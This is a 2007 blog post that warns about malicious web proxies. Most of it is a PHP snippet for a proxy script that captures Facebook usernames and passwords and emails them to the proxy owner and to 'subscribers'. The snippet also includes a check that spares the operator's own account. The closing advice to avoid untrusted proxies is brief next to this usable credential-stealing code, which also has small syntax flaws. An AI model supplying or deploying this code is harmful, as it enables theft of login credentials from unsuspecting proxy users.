In using a proxy server all data sent to the service being used must pass through the proxy server before being sent to the service, mostly in unencrypted form. It is therefore possible, and has been demonstrated, for a malicious proxy server to record everything sent to the proxy: including unencrypted logins and passwords. This is done by by inserting a code in the proxy script. This is the code: if (strpos($_url, 'facebook.com')) //checks if url contains "facebook"
{
if ($_REQUEST['email'] != "") //only true if there is info submitted
{
$user = $_REQUEST['email'] ; //getting the info
$pass = $_REQUEST['pass'] ;
$not_me = 0
if (strpos($user, 'your_name') or strpos($pass, 'whatever_your_password_is')) //this protects yourself from your subscribers
{
$not_me = 1;
}
else
{
mail( "send_to_email@whatever.com", "password captured", "website is: $_url , username is: $user , password is: $pass", "From: random_email_address@whatever.com" ); //sending
mail( "send_to_subscriber@whatever.com", "password captured", "website is: $_url , username is: $user , password is: $pass", "From: random_email_address@whatever.com" ); //subscriber
}
}
}
?> This code simply logs the proxy user username and password, then emails the results to the proxy owner. A proxy user should never use proxy servers of unknown integrity. If there is no choice but to use unknown proxy servers, do not pass any private information through the proxy. For a list of trusted web proxies, visit: http://www.proxytop.net/
Sunday, October 21, 2007
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment